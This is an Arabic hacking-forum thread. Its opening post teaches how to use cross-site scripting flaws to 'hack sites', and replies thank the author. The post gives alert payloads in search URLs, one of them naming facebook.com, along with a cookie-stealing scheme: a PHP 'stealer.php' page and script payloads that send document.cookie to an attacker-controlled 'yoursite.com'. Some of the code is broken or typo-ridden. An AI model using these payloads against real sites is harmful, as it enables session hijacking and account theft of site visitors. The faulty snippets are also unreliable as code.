1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Mr.7nsh | المشاهدات : 636 | الردود : 12
  1. Mr.7nsh Developer

    الأنتساب:
    ‏7 مارس 2013
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    نظام التشغيل:
    windows xp
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيفكم اخواني ان شاء الله بألف خير

    ندخل في الموضوع على طوول

    ثغرات Cross Site Scripting


    [​IMG]
    [​IMG]

    [​IMG]

    ما هي ثغرات XSS في المواقع و كيفية الإستفادة منها لاختراق المواقع :ُ{a3}:ُ؟

    ان المواقع المصابة بثغرات ال XSS هي المواقع التي تستطيع التعديل على محتوى

    مصدرها و ادخال كود javascript أو HTML او PHP

    ما يجب ان تعرفه HTML,javascript,PHP

    اي ان ثغرة XSS تعني امكانية تعديل محتويات الموقع :ُ{ze}:ُ

    و معظم هذه الثغرات موجودة في مربعات البحث في المواقع :ُ{1u}:ُ

    مثلا عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص.

    www.facebook.com/search.php?q=word

    يكون الموقع قد كتب في صفح البحث جملة "نتائج البحث ل word : ".

    و لكن ماذا اذا أدخلنا سكريبت جافا سكريبت في مربع البحث؟

    [JS]http://www.facebook.com/search.php?q=<script>alert("XSS")</script>word[/JS]

    ستكتب صفحة البحث "نتائج البحث ل <script>alert("XSS")</script>word : "

    هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة XSS

    هذا يعني ان الموقع مصاب بثغرة XSS

    لماذا يكون الموقع مصابا بها ؟

    لأن مبرمجي الموقع كسولين جدا ليفلترو كلمة البحث من الرموز المميزة مثل

    #@$%^,.<>
    ليمنعو من إدخال كود javascript او HTML

    هناك نوعين من ثغرات الXSS

    النوع الدائم :

    يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .

    حيث في مربع التعليق على موقع ما ندخل مثلا كود جافا سكريبت .

    <script>alert("XSS")</script>

    و سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة

    النوع المؤقت :
    يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم

    و لكن نستطيع إدراجه فقط عن طريق رابط البحث مثل المثال السابق

    http://www.infectedsite.com/search.php?q=<script>alert("XSS")</script>word

    ما الفائدة من ثغرات XSS و كيف نستطيع اختراق الموقع عن طريقها ؟

    هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات XSS

    أهمها سرقة الكوكيز

    تحتاج الى استضافة موقع تدعم PHP

    ننشئ صفحة PHP مثال stealer.php

    تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة GET

    كود PHP:
     <?php
     $data
    =$_GET["c"]
     
    $f=open("cookies.tct","w")
     
    $f.write($data)
     
    $f.close()
     
    ?>
    هذه الصفحة سوف تكتب البيانات التي تردها الى ملف cookies.txt و البيانات التي

    سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة

    مثال في الثغرات المؤقتة في طريقة البحث :

    كود PHP:
    http://www.infectedsite.com/search.php?q=<script>document.location("http://ypursite.com/stealer.php?c="+document.cookie);</script>
    هنا دمجنا السكريبت

    [JS]
    <script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    هذا الكود سيحول الضية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيمو

    الكوكيز عن طريق الأمر

    document.cookie

    هنا اذا فتحنا الملف


    ستجد الككيز للمستخدم مكتوبة فيها

    اما في الثغرات الدائمة فيكفي ادخال الكود

    [JS]<script>document.location("http://yoursite.com/stealer.php?c="+document.location)</script>[/JS]

    ليسرق الكوكيز

    و أيضا في الثغرات الدائمة نستطيع ان نحول متصفح الموقع المصاب بالثغرة XSS

    عن طريق سكريبت
    :ُae@:
     
  2. al_98r Developer

    الأنتساب:
    ‏21 يوليو 2014
    المشاركات:
    112
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك الف عافيه على الشرح
    ما قصرت
    ابدعت
    100%
    :ُ{10}:ُ
     
  3. مجنــ قلبي ـون Developer

    الأنتساب:
    ‏18 يونيو 2012
    المشاركات:
    68
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    الإقامة:
    قلــــiq-t34mــــــب
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    يعطيك العافية على جهدك المميز
    مشكوووور ربي يوفقك ويجزاك الخير
     
  4. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    عاشت ايدك
    شرح جميل جداً و منسق
    بارك الله بك
    {1!$8}
     
  5. !»°بہًكہًر الہًعہًراقہًي°«! нєℓℓ вσуѕ тєαм مراقب عآم

    الأنتساب:
    ‏7 فبراير 2015
    المشاركات:
    638
    الإعجابات المتلقاة:
    1,416
    نقاط الجائزة:
    515
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    العراق\واسط
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    Visual Basic
    Facebook:
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    ابداع تقبل مروري
     
  6. yacine-dz Developer

    الأنتساب:
    ‏18 مايو 2015
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Perl
    Facebook:
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    والله اخي شرح روعة بس ما فهمت كتير ممكن شرح تطبيقي
     
  7. مصطفى الموسوي V • I • P

    الأنتساب:
    ‏5 ديسمبر 2014
    المشاركات:
    438
    الإعجابات المتلقاة:
    789
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    دولة امير المؤمنين
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    YouTube:
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    وعليك السلام ورحمة الله وبركاتة
    بالصراحة موضوع جيد وتنسيق رائع
    استمر في جديدك
    تحياتي
    {1!$7}​
     
  8. Hacker-X Developer

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    91
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    قطر
    نظام التشغيل:
    windows 8.1
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    مبدع أخي بارك الله فيك
     
  9. OuT-L4w <b><font size="4"><font color="#FF0000">Ṩ</font><f Developer

    الأنتساب:
    ‏10 ديسمبر 2011
    المشاركات:
    62
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    KeyBoard
    نظام التشغيل:
    Linux
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    الله يعافيك اخي .^
     
  10. تــــركــــي DeveloPer Plus

    الأنتساب:
    ‏25 ابريل 2012
    المشاركات:
    180
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    40
    رد: ثغرات Cross Site Scripting تقرير شامل عن ثغرات XSS

    بارك الله فيك ي بطل :{1}:​
     

مشاركة هذه الصفحة